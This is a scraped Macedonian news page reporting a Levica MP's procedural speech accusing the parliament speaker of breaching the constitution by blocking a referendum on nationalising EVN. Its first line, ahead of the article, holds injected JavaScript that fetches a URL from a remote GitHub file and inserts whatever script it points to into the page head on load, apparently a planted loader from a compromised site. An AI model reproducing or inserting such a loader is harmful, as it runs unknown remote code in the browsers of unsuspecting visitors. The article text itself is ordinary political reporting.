;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); (Видео) Крмов до Џафери: Плукате по македонскиот Устав и народ - Антропол
АктуелноЛокално

(Видео) Крмов до Џафери: Плукате по македонскиот Устав и народ

  • Процедурално обраќање на пратеникот на Левица, Борислав Крмов, за национализацијата на ЕВН

„Зборуваме за национализацијата на ЕВН – враќање во доминантно сопствеништво на државата.

Ние имавме три иницијативи за референдум. За две, Вие се поставивте како да сте уставен судија и ги отфрливте, а последната, третата, дозволивте да биде ставена на дневен ред (како тоа да е Ваш ексклузивитет), а расправата не е отворена. Со тоа е прекршен Уставот – ние да немаме право на референдум.

Вие ќе ја изгласате точкава ПРОТИВ, ќе има расправа и толку, но ние ни тоа не го добиваме.

Предлагачот на точката, кој е повикан во Собранието на седницата, на пет минути пред почетокот, службите му велат да си оди. Точката не се отвори, за што образложија не ја отвараат бидејќи предлагачот не е тука.

За денешната расправа, предлагачот не е ни повикан. Манипулирате со луѓето – ги повикувате, ги бркате, а потоа обвинувате дека не ја отворате точката бидејќи предлагачот не е тука. Тоа е многу ниско – плукате по Уставот, законите и по македонскиот народ.